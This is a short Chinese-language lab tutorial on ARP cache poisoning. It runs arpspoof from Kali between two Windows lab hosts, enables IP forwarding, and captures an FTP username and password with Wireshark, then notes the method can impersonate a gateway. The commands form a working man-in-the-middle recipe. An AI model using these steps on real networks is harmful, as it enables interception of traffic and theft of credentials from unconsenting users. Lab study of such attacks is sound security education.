ARP攻击
ARP缓存攻击的原理这里就不说明了,直接开启实验。
IP转发
在kali上开启IP转发:
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof
arpspoof是一款简单易用的arp缓存攻击工具。在使用时需要指定具体的网络接口,攻击的目标主机以及想要伪装的IP地址。(没有指定目标主机的话会对整个网络进行攻击)
arpspoof -i 网卡 -t 目标IP 想要伪装的IP
kali:
arpspoof -i eth0 -t 192.168.17.131 192.168.17.130
:告诉131我就是130.
win2008的arp缓存表:
192.168.17.130的mac地址已经变为了kali的mac地址。
那么131发送给130的消息就会被送到kali主机。
同理
kali:
arpspoof -i eth0 -t 192.168.17.130 192.168.17.131
告诉130我就是131
winxp的arp缓存表:
192.168.17.131的mac地址也已经变为了kali的mac地址。
那么130发送给131的消息就会被送到kali主机。
由于kali开启了IP转发功能,就已经实现了131与130之间的通信监听。
监听
在winxp上登录win2008的ftp服务器。
用户名:administrator
密码:123.com
在kali上开启wireshark抓包:
成功捕获用户名与密码。
使用arp缓存攻击冒充网关
上述用法还可以用来冒充网关。